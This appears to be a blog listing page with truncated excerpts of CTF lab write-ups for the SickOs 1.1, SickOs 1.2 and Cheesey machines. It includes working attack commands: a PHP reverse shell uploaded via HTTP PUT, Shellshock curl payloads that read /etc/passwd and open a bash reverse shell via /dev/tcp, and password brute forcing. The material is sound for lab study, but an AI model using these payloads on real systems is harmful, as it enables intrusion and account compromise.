All about CTF writeups

Here's my solution for SickOs:1.2. The machine can be downloaded from here. Port Scanning Using nmap to scan all TCP ports. $ nmap -sC -sV -p- 192.168.1.102 We find 2 ports open. Enumeration Browsing the web. Using dirb to scan directories. dirb http://192.168.1.102 -r Interesting, lets browse /test directory. We check for HTTP methods. Interesting. We find that PUT method is allowed, so we can easily upload the shell. Before uploading the php reverse shell file we first edit the listening IP and set the listening port number to 443. Lets upload the shell. $ curl -v --upload-file shell.php http://192.168.1.102/test/ -0 We have successfully uploaded the shell. Initial Access Now to run the exploit we simply click the shell file. And on the other hand we start the netcat listener. We get the reverse shell file. Privilege Escalation We check the cron directories, seems that chkrootkit runs daily. $ ls -la /etc/cron* We check the version. We search for the exploit and we find one. $ se...

Here's  my solution for SickOs:1.1. The machine can be downloaded from here. Port Scanning Using nmap to scan all TCP ports. $ nmap -Pn -sC -sV -p- 192.168.1.107 We find 2 ports open. Enumeration Before browsing the web we first set the proxy. Now lets browse the web. Using dirb to scan directories. $ dirb http://192.168.1.107 -p 192.168.1.107:3128   Further scanning the /cgi-bin directory. $ dirb http://192.168.1.107/cgi-bin/ -p 192.168.1.107:3128 Browsing /status. Initial Access Trying for shell shock. $ curl --proxy http://192.168.1.107:3128 -H "user-agent: () { :; }; echo; echo; /bin/sh -c 'cat /etc/passwd'" http://192.168.1.107/cgi-bin/status This seems working fine. Lets get the shell. $ curl --proxy http://192.168.1.107:3128 -H "user-agent: () { :; }; echo; echo; /bin/bash -c 'bash -i >& /dev/tcp/192.168.1.108/1234 0>&1'" http://192.168.1.107/cgi-bin/status  We get the shell. Privilege Escalation From www-data > sickos. We...

Here's my solution for Cheesey:Cheeseyjack. The machine can be downloaded from here. Port Scanning Using Nmap to scan all TCP  Ports. $ nmap -sC -sV -p- 192.168.1.106 We find 11 ports open. Enumeration Browsing the web. Using dirb to scan the directories. $ dirb http://192.168.1.106 -r Browsing /it_security.   Lets check this note.txt From this message, we can take a note on the names- cheese and crab can be user names. Browsing /project_management. Interesting, a login page. Since SMB ports are open we run enum4linux against the host to find some useful information. $ enum4linux -a 192.168.1.106 Interesting. We find 2 users- ch33sem4n and crab. The author has already given us the hint as- cewl. We use cewl to generate passwords for us. $ cewl http://192.168.1.106/project_management > password We user burp to brute force the password of the user- ch33s3m4n.   We get the password as- qdpm. We browse the login page and login with the credential- Email: ch33s3m4n@cheeseyj...